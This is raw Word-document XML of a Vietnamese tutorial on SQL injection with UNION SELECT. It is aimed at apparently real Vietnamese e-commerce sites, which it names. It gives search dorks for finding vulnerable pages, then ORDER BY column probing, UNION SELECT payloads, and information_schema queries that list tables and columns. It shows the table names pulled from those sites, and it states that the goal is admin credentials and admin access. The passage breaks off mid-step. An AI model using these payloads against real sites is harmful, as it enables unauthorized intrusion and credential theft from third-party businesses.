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C733D" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D964DE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CÁC BƯỚC TẤN CÔNG SỬ DỤNG LỆNH UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADB4D2" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00CD551D" w:rsidRDefault="00D964DE" w:rsidP="00D964DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD551D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CÔNG CỤ HỖ TRỢ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE7E9B" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00D964DE" w:rsidRDefault="00D964DE" w:rsidP="00D964DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D964DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Add-0n hackBar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BE17F" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00D964DE" w:rsidRDefault="00D964DE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C167FCE" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Kiểm tra lỗi sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631E44B" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tìm số cột mà câu truy vấn tạo ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FDEA7" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tìm cột chứa thông tin có thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD5223" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Xem phiên bản của CSDL và ngôn ngữ lập trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4B54D" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Xác định tên bảng chứa thông tin người quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC185F" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Xác định tài khoản/mật khẩu của quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFE6B4" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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6000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Truy cập vào phần giành cho quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED25A57" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E07201" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>1. Tìm kiếm trang web bị lỗi SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B826541" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>url inurl:product_detail php?id= site vn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34736719" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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</w:p>
    <w:p w14:paraId="4A4706EB" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Các từ khóa khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1413C" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>index.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599068CC" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>news.php id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14113753" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>article.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73841D20" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>games.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E5AC0" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>opinions.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC309E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>pages.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872186E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>product_detail.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2017B1" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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  <w:t>view.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639B212" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E715566" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>- Web không bị lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6035E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>tainguyenxanh.vn/product_detail.php?id=13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C1AC5" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>- Web bi loi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043BC785" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>http://kentshop.com.vn/?frame=product_detail&amp;id=241</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461E587" w14:textId="700E6017" w:rsidR="0076000E" w:rsidRDefault="00ED50E3" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Web tìm thấy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72893E06" w14:textId="2B652FF3" w:rsidR="00ED50E3" w:rsidRPr="00DE726D" w:rsidRDefault="00ED50E3" w:rsidP="00DE726D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DE726D">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.</w:t>
      </w:r>
      <w:r w:rsidR="00DE726D" w:rsidRPr="00DE726D">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>vn/?php=product_detail&amp;id=220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B9F60" w14:textId="3DE5CFB0" w:rsidR="00ED50E3" w:rsidRDefault="00ED50E3" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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79880A08" wp14:editId="704A5E3E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67FB" w14:textId="140333F7" w:rsidR="00DE726D" w:rsidRDefault="00C72BBE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Web 2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00F6246D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://ngoidongnai.com/?php=product_detail&amp;id=331</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A9ABA26" w14:textId="44D17267" w:rsidR="00C72BBE" w:rsidRDefault="00C72BBE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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1762573" wp14:editId="70F3C3E4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AF5D" w14:textId="4BD57037" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Web 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="008C48EB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://www.hhpstone.com/?php=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>product_detail&amp;cat=129&amp;id=136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C378360" w14:textId="7E8AA57E" w:rsidR="008C48EB" w:rsidRPr="0076000E" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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27FBBDB3" wp14:editId="0BF145F4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25F7" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA SỐ CỘT CỦA TABLE MÀ SQL TRUY VẤN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5037DD" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>kentshop.com.vn/?frame=product_detail&amp;id=241 order by 17--</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7D0F0" w14:textId="4C1E54A0" w:rsidR="00DE726D" w:rsidRDefault="00DE726D" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E747EF0" wp14:editId="4EABE6C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6560" w14:textId="21C786E8" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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7E8F2C92" wp14:editId="1E16288D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C5EE" w14:textId="52304777" w:rsidR="00DE726D" w:rsidRPr="0076000E" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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13282EA" wp14:editId="130A7B16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B2B7" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA CỘT BỊ LỖI MÀ TA CÓ THỂ KHAI THÁC ĐƯỢC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426C6E2" w14:textId="33FE3D61" w:rsidR="0076000E" w:rsidRDefault="0076000E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 xml:space="preserve">kentshop.com.vn/?frame=product_detail&amp;id=- 241 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 </w:t>
      </w:r>
      <w:r w:rsidR="00DC11BC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00DC11BC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Web 1: </w:t>
      </w:r>
      <w:r w:rsidR="00DC11BC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Mã: </w:t>
      </w:r>
      <w:r w:rsidR="00DC11BC" w:rsidRPr="00DC11BC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A8B20" w14:textId="4B8B9AF5" w:rsidR="00DC11BC" w:rsidRDefault="00DC11BC" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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1454426" wp14:editId="1719DB73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883D" w14:textId="7C115FDD" w:rsidR="00C3587D" w:rsidRDefault="00C3587D" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Web 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5630CA" wp14:editId="14BF3784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8EAE" w14:textId="3E9922B3" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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3D50299" wp14:editId="27F247E9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7D9D" w14:textId="77777777" w:rsidR="008C48EB" w:rsidRPr="0076000E" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA8B2FA" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA MỘT SỐ THÔNG TIN CỦA DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E709B8" w14:textId="36E758C2" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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="00961A23">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>@@v</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="000A385E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sion</w:t>
      </w:r>
      <w:r w:rsidR="00961A23">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026CBD13" w14:textId="3A56C155" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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="00961A23">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E4497" w14:textId="49C0ABBF" w:rsidR="0076000E" w:rsidRDefault="0076000E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  <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F899F57" w14:textId="167EE7C5" w:rsidR="005D1638" w:rsidRDefault="005D1638" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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3BC77DA" wp14:editId="26E4B042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338E" w14:textId="03E6DBFA" w:rsidR="00C3587D" w:rsidRDefault="00C3587D" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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085FCC76" wp14:editId="0F3759FB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A6B7" w14:textId="0AE34FB7" w:rsidR="008C48EB" w:rsidRPr="0076000E" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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D75CF5C" wp14:editId="585DBA01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21A8" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LIỆT KÊ CÁC BẢNG TRONG</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA21D7" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="0024166B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE12007" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D968E19" w14:textId="7021D6F1" w:rsidR="0076000E" w:rsidRDefault="0076000E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 xml:space="preserve">tbl_config,tbl_content,tbl_content_category,tbl_inchsize,tbl_manufacturer,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FD6E2" w14:textId="75237557" w:rsidR="005D1638" w:rsidRDefault="005D1638" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5AC51F" w14:textId="77777777" w:rsidR="005D1638" w:rsidRDefault="005D1638" w:rsidP="005D1638">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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6481429" wp14:editId="763A5A8F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0F80" w14:textId="77777777" w:rsidR="005D1638" w:rsidRDefault="005D1638" w:rsidP="005D1638">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1638">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=-220 UNION SELECT 1,2,3,4,5,unhex(hex(group_concat(table_name))),7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE48826" w14:textId="1F65C4B1" w:rsidR="005D1638" w:rsidRDefault="005D1638" w:rsidP="005D1638">
      <w:r>
        <w:t>tbl_product_category,tbl_user,tbl_product,tbl_config,tbl_product_new,tbl_product_special,tbl_visitor,tbl_content,tbl_content_category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37719A" w14:textId="25FC0ACF" w:rsidR="00C3587D" w:rsidRPr="0076000E" w:rsidRDefault="00C3587D" w:rsidP="005D1638">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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1377E44" wp14:editId="64908D35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7141" w14:textId="56C85374" w:rsidR="005D1638" w:rsidRPr="0076000E" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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5E367E7A" wp14:editId="5202DB09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41F3" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> LIỆT KÊ CÁC CỘT TRONG TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD048E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="0076000E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>http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="0024166B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>))),4,5,6,7,8,9,10,11,12,13,1</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4,15,16,17 from information_</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5A98">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5A98">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>=CHAR(116, 98, 108, 95, 109, 101, 109, 98, 101, 114)</w:t>
      </w:r>
      <w:r w:rsidR="008C22CA">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194B065" w14:textId="77777777" w:rsidR="008C22CA" w:rsidRDefault="008C22CA" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hoặc</w:t>
